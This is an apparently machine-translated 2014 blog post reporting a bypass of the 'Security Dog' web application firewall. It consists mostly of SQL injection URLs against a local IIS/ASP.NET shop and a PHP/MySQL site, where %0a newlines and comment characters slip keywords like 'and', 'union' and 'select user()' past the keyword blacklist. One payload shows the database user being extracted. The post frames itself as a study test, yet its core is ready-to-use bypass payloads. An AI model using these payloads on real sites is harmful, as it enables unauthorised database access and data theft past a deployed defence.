Test time: 2014.10.21
Beta version: IIS version V3.3.09476 (2014-09-24), Apache V3.1.08512 (2014-05-29), are the latest versions available today.
Core characters used for bypassing:%0a, some special occasions need to be used in conjunction with an annotation.
To test the detailed steps:
1, the machine installed the presence of injected v5shop (framework for iis6+aspx+mssql2005 to test the IIS version of the Security Dog), the general injection test:
Default<textarea class="crayon-plain print-no" style="-moz-tab-size: 4; font-size: 12px ! important; line-height: 15px ! important; z-index: 0; opacity: 0; overflow: hidden;" readonly="" data-settings="dblclick">http://192.168.91.152/cart.aspx?act=buy&id=1 and 1=user</textarea>
1 |
HTTP://192.168.91.152/cart.aspx?act=buy&id=1 and 1=user |
and is identified and intercepted as a keyword.
2. Join%0a to try again:
Default<textarea class="crayon-plain print-no" style="-moz-tab-size: 4; font-size: 12px ! important; line-height: 15px ! important; z-index: 0; opacity: 0; overflow: hidden;" readonly="" data-settings="dblclick">Http://192.168.91.152/cart.aspx?act=buy&id=1%0AAND 1=user</textarea>
1 |
HTTP://192.168.91.152/cart.aspx?act=buy&id=1%0aand 1=user |
Successfully bypasses and implements the injection.
In addition: in the APACHE+PHP+MYSQL environment:
The injection attempt is done as usual:
Default<textarea class="crayon-plain print-no" style="-moz-tab-size: 4; font-size: 12px ! important; line-height: 15px ! important; z-index: 0; opacity: 0; overflow: hidden;" readonly="" data-settings="dblclick">http://192.168.91.152:8000/About.php?did=2 and/**/(select User ()) = "</textarea>
1 |
HTTP://192.168.91.152:8000/about.php?did=2 and/**/(select User ()) = " |
Because and, user () are the keywords in the blacklist. Then we join%0a to try again:
Default<textarea class="crayon-plain print-no" style="-moz-tab-size: 4; font-size: 12px ! important; line-height: 15px ! important; z-index: 0; opacity: 0; overflow: hidden;" readonly="" data-settings="dblclick">http://192.168.91.152:8000/about.php?did=2%0aand/**/(Select%0auser ()) = "Http://192.168.91.152:8000/ about.php?did=2%0aand/**/(Select%0auser ()) = ' Root@localhost '</textarea>
123 |
http://192.168.91.152:8000/about.php?did=2%0aand/**/(Select%0auser ()) = " http://192.168.91.152:8000/about.php?did=2%0aand/**/(Select%0auser ()) = ' [email protected] ' |
Of course,%0a is just a way of thinking, which spreads out as multiple%0a overlays, or mixed with the annotation character –,/**/. Like what:
Default<textarea class="crayon-plain print-no" style="-moz-tab-size: 4; font-size: 12px ! important; line-height: 15px ! important; z-index: 0; opacity: 0; overflow: hidden;" readonly="" data-settings="dblclick">Http://192.168.91.152:8000/About.php?did=-2%0Aunion--%0Aselect%0Auser ()</textarea>
1 |
HTTP://192.168.91.152:8000/about.php?did=-2%0aunion--%0aselect%0auser () |
Successful bypass, no pressure.
This method is for study only and should not be used for illegal purposes. If you need to reprint, please retain the Copyright (Std Brother Company)
Another: Tested security dog version packaged: http://pan.baidu.com/s/1c05v54k (contains IIS and Apache versions)
Original address: http://www.91ri.org/11138.html
Website Security Dog Latest version bypass test